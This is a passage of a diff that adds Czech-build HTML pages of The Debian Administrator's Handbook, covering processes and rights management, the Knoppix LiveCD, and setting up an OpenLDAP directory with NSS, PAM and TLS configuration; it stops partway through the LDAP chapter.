+				A process is a running instance of a program. This requires memory to store both the program itself and its operating data. The kernel is in charge of creating and tracking them. When a program runs, the kernel first sets aside some memory, then loads the executable code from the filesystem into it, and then starts the code running. It keeps information about this process, the most visible of which is an identification number known as <span
+              class="emphasis"><em>pid</em></span> (<span
+              class="emphasis"><em>process identifier</em></span>).
+			</div><div
+            class="para">
+				Unix-like kernels (including Linux), like most other modern operating systems, are capable of “multi-tasking”. In other words, they allow running many processes “at the same time”. There is actually only one running process at any one time, but the kernel cuts time into small slices and runs each process in turn. Since these time slices are very short (in the millisecond range), they create the illusion of processes running in parallel, although they are actually only active during some time intervals and idle the rest of the time. The kernel's job is to adjust its scheduling mechanisms to keep that illusion, while maximizing the global system performance. If the time slices are too long, the application may not appear as responsive as desired. Too short, and the system loses time switching tasks too frequently. These decisions can be tweaked with process priorities. High-priority processes will run for longer and with more frequent time slices than low-priority processes.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>NOTE</em></span> Multi-processor systems (and variants)</strong></p></div></div></div><div
+              class="para">
+				The limitation described above of only one process being able to run at a time, doesn't always apply. The actual restriction is that there can only be one running process <span
+                class="emphasis"><em>per processor core</em></span> at a time. Multi-processor, multi-core or “hyper-threaded” systems allow several processes to run in parallel. The same time-slicing system is still used, though, so as to handle cases where there are more active processes than available processor cores. This is far from unusual: a basic system, even a mostly idle one, almost always has tens of running processes.
+			</div></div><div
+            class="para">
+				Of course, the kernel allows running several independent instances of the same program. But each can only access its own time slices and memory. Their data thus remain independent.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.permissions"></a>B.4.5. Rights Management</h3></div></div></div><div
+            class="para">
+				Unix-like systems are also multi-user. They provide a rights management system that supports separate users and groups; it also allows control over actions based on permissions. The kernel manages data for each process, allowing it to control permissions. Most of the time, a process is identified by the user who started it. That process is only permitted to take those actions available to its owner. For instance, trying to open a file requires the kernel to check the process identity against access permissions (for more details on this particular example, see <a
+              class="xref"
+              href="sect.rights-management.html">9.3 – „Managing Rights“</a>).
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.computer-layers.html"><strong>Předcházející</strong>B.3. Inner Workings of a Computer: the Different ...</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.user-space.html"><strong>Další</strong>B.5. The User Space</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.knoppix.html b/tmp/cs-CZ/html/sect.knoppix.html
new file mode 100644
index 000000000..711ce50ed
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.knoppix.html
@@ -0,0 +1,107 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">A.4. Knoppix</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Live CD, Specificities, Particular Choices" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="derivative-distributions.html"
+        title="Příloha A. Derivative Distributions" /><link
+        rel="prev"
+        href="sect.linux-mint.html"
+        title="A.3. Linux Mint" /><link
+        rel="next"
+        href="sect.aptosid.html"
+        title="A.5. Aptosid and Siduction" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.knoppix.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.linux-mint.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.aptosid.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.knoppix"></a>A.4. Knoppix</h2></div></div></div><a
+          id="id-1.20.7.2"
+          class="indexterm"></a><a
+          id="id-1.20.7.3"
+          class="indexterm"></a><a
+          id="id-1.20.7.4"
+          class="indexterm"></a><a
+          id="id-1.20.7.5"
+          class="indexterm"></a><div
+          class="para">
+			The Knoppix distribution barely needs an introduction. It was the first popular distribution to provide a <span
+            class="emphasis"><em>LiveCD</em></span>; in other words, a bootable CD-ROM that runs a turn-key Linux system with no requirement for a hard-disk — any system already installed on the machine will be left untouched. Automatic detection of available devices allows this distribution to work in most hardware configurations. The CD-ROM includes almost 2 GB of (compressed) software, and the DVD-ROM version has even more.
+		</div><div
+          class="para">
+			Combining this CD-ROM to a USB stick allows carrying your files with you, and to work on any computer without leaving a trace — remember that the distribution doesn't use the hard-disk at all. Knoppix uses LXDE (a lightweight graphical desktop) by default, but the DVD version also includes GNOME and Plasma. Many other distributions provide other combinations of desktops and software. This is, in part, made possible thanks to the <span
+            class="pkg pkg">live-build</span> Debian package that makes it relatively easy to create a LiveCD. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="http://live.debian.net/">http://live.debian.net/</a></div>
+		</div><a
+          id="id-1.20.7.8"
+          class="indexterm"></a><div
+          class="para">
+			Note that Knoppix also provides an installer: you can first try the distribution as a LiveCD, then install it on a hard-disk to get better performance. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="http://www.knopper.net/knoppix/index-en.html">http://www.knopper.net/knoppix/index-en.html</a></div>
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.linux-mint.html"><strong>Předcházející</strong>A.3. Linux Mint</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.aptosid.html"><strong>Další</strong>A.5. Aptosid and Siduction</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.ldap-directory.html b/tmp/cs-CZ/html/sect.ldap-directory.html
new file mode 100644
index 000000000..1f4d98967
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.ldap-directory.html
@@ -0,0 +1,693 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">11.7. LDAP Directory</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Postfix, Apache, NFS, Samba, Squid, OpenLDAP, SIP" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="network-services.html"
+        title="Kapitola 11. Network Services: Postfix, Apache, NFS, Samba, Squid, LDAP, SIP, XMPP, TURN" /><link
+        rel="prev"
+        href="sect.http-ftp-proxy.html"
+        title="11.6. HTTP/FTP Proxy" /><link
+        rel="next"
+        href="sect.rtc-services.html"
+        title="11.8. Real-Time Communication Services" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.ldap-directory.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.http-ftp-proxy.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.rtc-services.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.ldap-directory"></a>11.7. LDAP Directory</h2></div></div></div><a
+          id="id-1.14.10.2"
+          class="indexterm"></a><a
+          id="id-1.14.10.3"
+          class="indexterm"></a><a
+          id="id-1.14.10.4"
+          class="indexterm"></a><div
+          class="para">
+			OpenLDAP is an implementation of the LDAP protocol; in other words, it is a special-purpose database designed for storing directories. In the most common use case, using an LDAP server allows centralizing management of user accounts and the related permissions. Moreover, an LDAP database is easily replicated, which allows setting up multiple synchronized LDAP servers. When the network and the user base grows quickly, the load can then be balanced across several servers.
+		</div><div
+          class="para">
+			LDAP data is structured and hierarchical. The structure is defined by “schemas” which describe the kind of objects that the database can store, with a list of all their possible attributes. The syntax used to refer to a particular object in the database is based on this structure, which explains its complexity.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.14.10.7"></a>11.7.1. Installing</h3></div></div></div><div
+            class="para">
+				The <span
+              class="pkg pkg">slapd</span> package contains the OpenLDAP server. The <span
+              class="pkg pkg">ldap-utils</span> package includes command-line tools for interacting with LDAP servers.
+			</div><a
+            id="id-1.14.10.7.3"
+            class="indexterm"></a><div
+            class="para">
+				Installing <span
+              class="pkg pkg">slapd</span> usually asks very few questions and the resulting database is unlikely to suit your needs. Fortunately a simple <code
+              class="command">dpkg-reconfigure slapd</code> will let you reconfigure the LDAP database with more details:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						Omit OpenLDAP server configuration? No, of course, we want to configure this service.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						DNS domain name: “<code
+                    class="literal">falcot.com</code>”.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						Organization name: “Falcot Corp”.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						An administrative passwords needs to be typed in.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						Database backend to use: “MDB”.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						Do you want the database to be removed when <span
+                    class="pkg pkg">slapd</span> is purged? No. No point in risking losing the database in case of a mistake.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						Move old database? This question is only asked when the configuration is attempted while a database already exists. Only answer “yes” if you actually want to start again from a clean database, for instance if you run <code
+                    class="command">dpkg-reconfigure slapd</code> right after the initial installation.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						Allow LDAPv2 protocol? No, there is no point in that. All the tools we are going to use understand the LDAPv3 protocol.
+					</div></li></ul></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> LDIF format</strong></p></div></div></div><div
+              class="para">
+				An LDIF file (<span
+                class="emphasis"><em>LDAP Data Interchange Format</em></span>) is a portable text file describing the contents of an LDAP database (or a portion thereof); this can then be used to inject the data into any other LDAP server.
+			</div><a
+              id="id-1.14.10.7.6.3"
+              class="indexterm"></a></div><div
+            class="para">
+				A minimal database is now configured, as demonstrated by the following query:
+			</div><pre
+            class="screen">
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>ldapsearch -x -b dc=falcot,dc=com</code></strong>
+<code
+              class="computeroutput"># extended LDIF
+#
+# LDAPv3
+# base &lt;dc=falcot,dc=com&gt; with scope sub
+# filter: (objectclass=*)
+# requesting: ALL
+#
+
+# falcot.com
+dn: dc=falcot,dc=com
+objectClass: top
+objectClass: dcObject
+objectClass: organization
+o: Falcot Corp
+dc: falcot
+
+# admin, falcot.com
+dn: cn=admin,dc=falcot,dc=com
+objectClass: simpleSecurityObject
+objectClass: organizationalRole
+cn: admin
+description: LDAP administrator
+
+# search result
+search: 2
+result: 0 Success
+
+# numResponses: 3
+# numEntries: 2
+</code></pre><div
+            class="para">
+				The query returned two objects: the organization itself, and the administrative user.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.14.10.8"></a>11.7.2. Filling in the Directory</h3></div></div></div><div
+            class="para">
+				Since an empty database is not particularly useful, we are going to inject into it all the existing directories; this includes the users, groups, services and hosts databases.
+			</div><div
+            class="para">
+				The <span
+              class="pkg pkg">migrationtools</span> package provides a set of scripts dedicated to extract data from the standard Unix directories (<code
+              class="filename">/etc/passwd</code>, <code
+              class="filename">/etc/group</code>, <code
+              class="filename">/etc/services</code>, <code
+              class="filename">/etc/hosts</code> and so on), convert this data, and inject it into the LDAP database.
+			</div><a
+            id="id-1.14.10.8.4"
+            class="indexterm"></a><div
+            class="para">
+				Once the package is installed, the <code
+              class="filename">/etc/migrationtools/migrate_common.ph</code> must be edited; the <code
+              class="varname">IGNORE_UID_BELOW</code> and <code
+              class="varname">IGNORE_GID_BELOW</code> options need to be enabled (uncommenting them is enough), and <code
+              class="varname">DEFAULT_MAIL_DOMAIN</code>/<code
+              class="varname">DEFAULT_BASE</code> need to be updated.
+			</div><div
+            class="para">
+				The actual migration operation is handled by the <code
+              class="command">migrate_all_online.sh</code> command, as follows:
+			</div><pre
+            class="screen">
+<code
+              class="computeroutput"># </code><strong
+              class="userinput"><code>cd /usr/share/migrationtools</code></strong>
+<code
+              class="computeroutput"># </code><strong
+              class="userinput"><code>LDAPADD="/usr/bin/ldapadd -c" ETC_ALIASES=/dev/null ./migrate_all_online.sh</code></strong></pre><div
+            class="para">
+				The <code
+              class="command">migrate_all_online.sh</code> asks a few questions about the LDAP database into which the data is to be migrated. <a
+              class="xref"
+              href="sect.ldap-directory.html#tab-migrate-all">11.1</a> summarizes the answers given in the Falcot use-case.
+			</div><div
+            class="table"><a
+              xmlns=""
+              id="tab-migrate-all"></a><p
+              class="title"><strong>Tabulka 11.1. Answers to questions asked by the <code
+                  class="command">migrate_all_online.sh</code> script</strong></p><div
+              class="table-contents"><table
+                xmlns:d="http://docbook.org/ns/docbook"
+                class="lt-4-cols lt-7-rows"
+                summary="Answers to questions asked by the migrate_all_online.sh script"><colgroup><col
+                    align="justify" /><col
+                    align="justify" /></colgroup><thead><tr><th
+                      align="justify">Question</th><th
+                      align="justify">Answer</th></tr></thead><tbody><tr><td
+                      align="justify">X.500 naming context</td><td
+                      align="justify"><code
+                        class="literal">dc=falcot,dc=com</code></td></tr><tr><td
+                      align="justify">LDAP server hostname</td><td
+                      align="justify"><code
+                        class="literal">localhost</code></td></tr><tr><td
+                      align="justify">Manager DN</td><td
+                      align="justify"><code
+                        class="literal">cn=admin,dc=falcot,dc=com</code></td></tr><tr><td
+                      align="justify">Bind credentials</td><td
+                      align="justify">the administrative password</td></tr><tr><td
+                      align="justify">Create DUAConfigProfile</td><td
+                      align="justify">no</td></tr></tbody></table></div></div><div
+            class="para">
+				We deliberately ignore migration of the <code
+              class="filename">/etc/aliases</code> file, since the standard schema as provided by Debian does not include the structures that this script uses to describe email aliases. Should we want to integrate this data into the directory, the <code
+              class="filename">/etc/ldap/schema/misc.schema</code> file should be added to the standard schema.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TOOL</em></span> Browsing an LDAP directory</strong></p></div></div></div><div
+              class="para">
+				The <code
+                class="command">jxplorer</code> command (in the package of the same name) is a graphical tool allowing to browse and edit an LDAP database. It is an interesting tool that provides an administrator with a good overview of the hierarchical structure of the LDAP data.
+			</div><a
+              id="id-1.14.10.8.11.3"
+              class="indexterm"></a></div><div
+            class="para">
+				Also note the use of the <code
+              class="literal">-c</code> option to the <code
+              class="command">ldapadd</code> command; this option requests that processing doesn't stop in case of error. Using this option is required because converting the <code
+              class="filename">/etc/services</code> often generates a few errors that can safely be ignored.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.14.10.9"></a>11.7.3. Managing Accounts with LDAP</h3></div></div></div><div
+            class="para">
+				Now the LDAP database contains some useful information, the time has come to make use of this data. This section focuses on how to configure a Linux system so that the various system directories use the LDAP database.
+			</div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.config-nss"></a>11.7.3.1. Configuring NSS</h4></div></div></div><div
+              class="para">
+					The NSS system (Name Service Switch, see sidebar <a
+                class="xref"
+                href="sect.user-group-databases.html#sidebar.intro-nss"><span
+                  class="emphasis"><em>GOING FURTHER</em></span> NSS and system databases</a>) is a modular system designed to define or fetch information for system directories. Using LDAP as a source of data for NSS requires installing the <span
+                class="pkg pkg">libnss-ldap</span> package. Its installation asks a few questions; the answers are summarized in <a
+                class="xref"
+                href="sect.ldap-directory.html#tab-libnss-ldap">11.2</a>.
+				</div><a
+              id="id-1.14.10.9.3.3"
+              class="indexterm"></a><div
+              class="table"><a
+                xmlns=""
+                id="tab-libnss-ldap"></a><p
+                class="title"><strong>Tabulka 11.2. Configuring the <span
+                    class="pkg pkg">libnss-ldap</span> package</strong></p><div
+                class="table-contents"><table
+                  xmlns:d="http://docbook.org/ns/docbook"
+                  class="lt-4-cols gt-7-rows"
+                  summary="Configuring the libnss-ldap package"><colgroup><col
+                      align="justify" /><col
+                      align="justify" /></colgroup><thead><tr><th
+                        align="justify">Question</th><th
+                        align="justify">Answer</th></tr></thead><tbody><tr><td
+                        align="justify">LDAP server Uniform Resource Identifier</td><td
+                        align="justify"> <code
+                          class="literal">ldap://ldap.falcot.com</code> </td></tr><tr><td
+                        align="justify">Distinguished name of the search base</td><td
+                        align="justify"> <code
+                          class="literal">dc=falcot,dc=com</code> </td></tr><tr><td
+                        align="justify">LDAP version to use</td><td
+                        align="justify"> <code
+                          class="literal">3</code> </td></tr><tr><td
+                        align="justify">Does the LDAP database require login?</td><td
+                        align="justify">no</td></tr><tr><td
+                        align="justify">Special LDAP privileges for root</td><td
+                        align="justify">yes</td></tr><tr><td
+                        align="justify">Make the configuration file readable/writeable by its owner only</td><td
+                        align="justify">no</td></tr><tr><td
+                        align="justify">LDAP account for root</td><td
+                        align="justify"> <code
+                          class="literal">cn=admin,dc=falcot,dc=com</code> </td></tr><tr><td
+                        align="justify">LDAP root account password</td><td
+                        align="justify">the administrative password</td></tr></tbody></table></div></div><div
+              class="para">
+					The <code
+                class="filename">/etc/nsswitch.conf</code> file then needs to be modified, so as to configure NSS to use the freshly-installed <code
+                class="command">ldap</code> module.
+				</div><div
+              class="example"><a
+                xmlns=""
+                id="id-1.14.10.9.3.6"></a><p
+                class="title"><strong>Příklad 11.26. The <code
+                    class="filename">/etc/nsswitch.conf</code> file</strong></p><div
+                class="example-contents"><pre
+                  class="programlisting">
+# /etc/nsswitch.conf
+#
+# Example configuration of GNU Name Service Switch functionality.
+# If you have the `glibc-doc' and `info' packages installed, try:
+# `info libc "Name Service Switch"' for information about this file.
+
+passwd: ldap compat
+group: ldap compat
+shadow: ldap compat
+
+hosts: files dns ldap
+networks: ldap files
+
+protocols: ldap db files
+services: ldap db files
+ethers: ldap db files
+rpc: ldap db files
+
+netgroup: ldap files
+</pre></div></div><div
+              class="para">
+					The <code
+                class="command">ldap</code> module is usually inserted before others, and it will therefore be queried first. The notable exception is the <code
+                class="literal">hosts</code> service since contacting the LDAP server requires consulting DNS first (to resolve <code
+                class="literal">ldap.falcot.com</code>). Without this exception, a hostname query would try to ask the LDAP server; this would trigger a name resolution for the LDAP server, and so on in an infinite loop.
+				</div><div
+              class="para">
+					If the LDAP server should be considered authoritative (and the local files used by the <code
+                class="command">files</code> module disregarded), services can be configured with the following syntax:
+				</div><div
+              class="para">
+					<code
+                class="literal"><em
+                  class="replaceable">service</em>: ldap [NOTFOUND=return] files</code>.
+				</div><div
+              class="para">
+					If the requested entry does not exist in the LDAP database, the query will return a “not existing” reply even if the resource does exist in one of the local files; these local files will only be used when the LDAP service is down.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.config-pam"></a>11.7.3.2. Configuring PAM</h4></div></div></div><div
+              class="para">
+					This section describes a PAM configuration (see sidebar <a
+                class="xref"
+                href="basic-configuration.html#sidebar.intro-pam"><span
+                  class="emphasis"><em>BEHIND THE SCENES</em></span> <code
+                  class="filename">/etc/environment</code> and <code
+                  class="filename">/etc/default/locale</code></a>) that will allow applications to perform the required authentications against the LDAP database.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>CAUTION</em></span> Broken authentication</strong></p></div></div></div><div
+                class="para">
+					Changing the standard PAM configuration used by various programs is a sensitive operation. A mistake can lead to broken authentication, which could prevent logging in. Keeping a root shell open is therefore a good precaution. If configuration errors occur, they can be then fixed and the services restarted with minimal effort.
+				</div></div><div
+              class="para">
+					The LDAP module for PAM is provided by the <span
+                class="pkg pkg">libpam-ldap</span> package. Installing this package asks a few questions very similar to those in <span
+                class="pkg pkg">libnss-ldap</span>; some configuration parameters (such as the URI for the LDAP server) are even actually shared with the <span
+                class="pkg pkg">libnss-ldap</span> package. Answers are summarized in <a
+                class="xref"
+                href="sect.ldap-directory.html#tab-libpam-ldap">11.3</a>.
+				</div><a
+              id="id-1.14.10.9.4.5"
+              class="indexterm"></a><div
+              class="table"><a
+                xmlns=""
+                id="tab-libpam-ldap"></a><p
+                class="title"><strong>Tabulka 11.3. Configuration of <span
+                    class="emphasis"><em>libpam-ldap</em></span></strong></p><div
+                class="table-contents"><table
+                  xmlns:d="http://docbook.org/ns/docbook"
+                  class="lt-4-cols lt-7-rows"
+                  summary="Configuration of libpam-ldap"><colgroup><col
+                      align="justify" /><col
+                      align="justify" /></colgroup><thead><tr><th
+                        align="justify">Question</th><th
+                        align="justify">Answer</th></tr></thead><tbody><tr><td
+                        align="justify">Allow LDAP admin account to behave like local root?</td><td
+                        align="justify">Yes. This allows using the usual <code
+                          class="command">passwd</code> command for changing passwords stored in the LDAP database.</td></tr><tr><td
+                        align="justify">Does the LDAP database require logging in?</td><td
+                        align="justify">no</td></tr><tr><td
+                        align="justify">LDAP account for root</td><td
+                        align="justify"> <code
+                          class="literal">cn=admin,dc=falcot,dc=com</code> </td></tr><tr><td
+                        align="justify">LDAP root account password</td><td
+                        align="justify">the LDAP database administrative password</td></tr><tr><td
+                        align="justify">Local encryption algorithm to use for passwords</td><td
+                        align="justify">crypt</td></tr></tbody></table></div></div><div
+              class="para">
+					Installing <span
+                class="pkg pkg">libpam-ldap</span> automatically adapts the default PAM configuration defined in the <code
+                class="filename">/etc/pam.d/common-auth</code>, <code
+                class="filename">/etc/pam.d/common-password</code> and <code
+                class="filename">/etc/pam.d/common-account</code> files. This mechanism uses the dedicated <code
+                class="command">pam-auth-update</code> tool (provided by the <span
+                class="pkg pkg">libpam-runtime</span> package). This tool can also be run by the administrator should they wish to enable or disable PAM modules.
+				</div><a
+              id="id-1.14.10.9.4.8"
+              class="indexterm"></a><a
+              id="id-1.14.10.9.4.9"
+              class="indexterm"></a><a
+              id="id-1.14.10.9.4.10"
+              class="indexterm"></a><a
+              id="id-1.14.10.9.4.11"
+              class="indexterm"></a><a
+              id="id-1.14.10.9.4.12"
+              class="indexterm"></a><a
+              id="id-1.14.10.9.4.13"
+              class="indexterm"></a></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.14.10.9.5"></a>11.7.3.3. Securing LDAP Data Exchanges</h4></div></div></div><a
+              id="id-1.14.10.9.5.2"
+              class="indexterm"></a><div
+              class="para">
+					By default, the LDAP protocol transits on the network as cleartext; this includes the (encrypted) passwords. Since the encrypted passwords can be extracted from the network, they can be vulnerable to dictionary-type attacks. This can be avoided by using an extra encryption layer; enabling this layer is the topic of this section.
+				</div><div
+              class="section"><div
+                class="titlepage"><div><div><h5
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.14.10.9.5.4"></a>11.7.3.3.1. Configuring the Server</h5></div></div></div><a
+                id="id-1.14.10.9.5.4.2"
+                class="indexterm"></a><a
+                id="id-1.14.10.9.5.4.3"
+                class="indexterm"></a><div
+                class="para">
+						The first step is to create a key pair (comprising a public key and a private key) for the LDAP server. The Falcot administrators reuse <span
+                  class="emphasis"><em>easy-rsa</em></span> to generate it (see <a
+                  class="xref"
+                  href="sect.virtual-private-network.html#sect.easy-rsa">10.2.1.1 – „Public Key Infrastructure: <span
+                    class="emphasis"><em>easy-rsa</em></span>“</a>). Running <code
+                  class="command">./build-key-server ldap.falcot.com</code> asks a few mundane questions (location, organization name and so on). The answer to the “common name” question <span
+                  class="emphasis"><em>must</em></span> be the fully-qualified hostname for the LDAP server; in our case, <code
+                  class="literal">ldap.falcot.com</code>.
+					</div><div
+                class="para">
+						This command creates a certificate in the <code
+                  class="filename">keys/ldap.falcot.com.crt</code> file; the corresponding private key is stored in <code
+                  class="filename">keys/ldap.falcot.com.key</code>.
+					</div><div
+                class="para">
+						Now these keys have to be installed in their standard location, and we must make sure that the private file is readable by the LDAP server which runs under the <code
+                  class="literal">openldap</code> user identity:
+					</div><pre
+                class="screen"><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>adduser openldap ssl-cert
+</code></strong><code
+                  class="computeroutput">Adding user `openldap' to group `ssl-cert' ...
+Adding user openldap to group ssl-cert
+Done.
+# </code><strong
+                  class="userinput"><code>mv keys/ldap.falcot.com.key /etc/ssl/private/ldap.falcot.com.key
+</code></strong><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>chown root:ssl-cert /etc/ssl/private/ldap.falcot.com.key
+</code></strong><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>chmod 0640 /etc/ssl/private/ldap.falcot.com.key
+</code></strong><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>mv newcert.pem /etc/ssl/certs/ldap.falcot.com.pem
+</code></strong></pre><div
+                class="para">
+						The <code
+                  class="command">slapd</code> daemon also needs to be told to use these keys for encryption. The LDAP server configuration is managed dynamically: the configuration can be updated with normal LDAP operations on the <code
+                  class="literal">cn=config</code> object hierarchy, and the server updates <code
+                  class="filename">/etc/ldap/slapd.d</code> in real time to make the configuration persistent. <code
+                  class="command">ldapmodify</code> is thus the right tool to update the configuration:
+					</div><div
+                class="example"><a
+                  xmlns=""
+                  id="id-1.14.10.9.5.4.9"></a><p
+                  class="title"><strong>Příklad 11.27. Configuring <code
+                      class="command">slapd</code> for encryption</strong></p><div
+                  class="example-contents"><pre
+                    class="screen"><code
+                      class="computeroutput"># </code><strong
+                      class="userinput"><code>cat &gt;ssl.ldif &lt;&lt;END
+dn: cn=config
+changetype: modify
+add: olcTLSCertificateFile
+olcTLSCertificateFile: /etc/ssl/certs/ldap.falcot.com.pem
+-
+add: olcTLSCertificateKeyFile
+olcTLSCertificateKeyFile: /etc/ssl/private/ldap.falcot.com.key
+-
+END
+</code></strong><code
+                      class="computeroutput"># </code><strong
+                      class="userinput"><code>ldapmodify -Y EXTERNAL -H ldapi:/// -f ssl.ldif
+</code></strong><code
+                      class="computeroutput">SASL/EXTERNAL authentication started
+SASL username: gidNumber=0+uidNumber=0,cn=peercred,cn=external,cn=auth
+SASL SSF: 0
+modifying entry "cn=config"
+</code></pre></div></div><div
+                class="sidebar"><div
+                  class="titlepage"><div><div><p
+                        class="title"><strong><span
+                            class="emphasis"><em>TOOL</em></span> <code
+                            class="command">ldapvi</code> to edit an LDAP directory</strong></p></div></div></div><a
+                  id="id-1.14.10.9.5.4.10.2"
+                  class="indexterm"></a><div
+                  class="para">
+						With <code
+                    class="command">ldapvi</code>, you can display an LDIF output of any part of the LDAP directory, make some changes in the text editor, and let the tool do the corresponding LDAP operations for you.
+					</div><div
+                  class="para">
+						It is thus a convenient way to update the configuration of the LDAP server, simply by editing the <code
+                    class="literal">cn=config</code> hierarchy.
+					</div><pre
+                  class="screen"><code
+                    class="computeroutput"># </code><strong
+                    class="userinput"><code>ldapvi -Y EXTERNAL -h ldapi:/// -b cn=config
+</code></strong></pre></div><div
+                class="para">
+						The last step for enabling encryption involves changing the <code
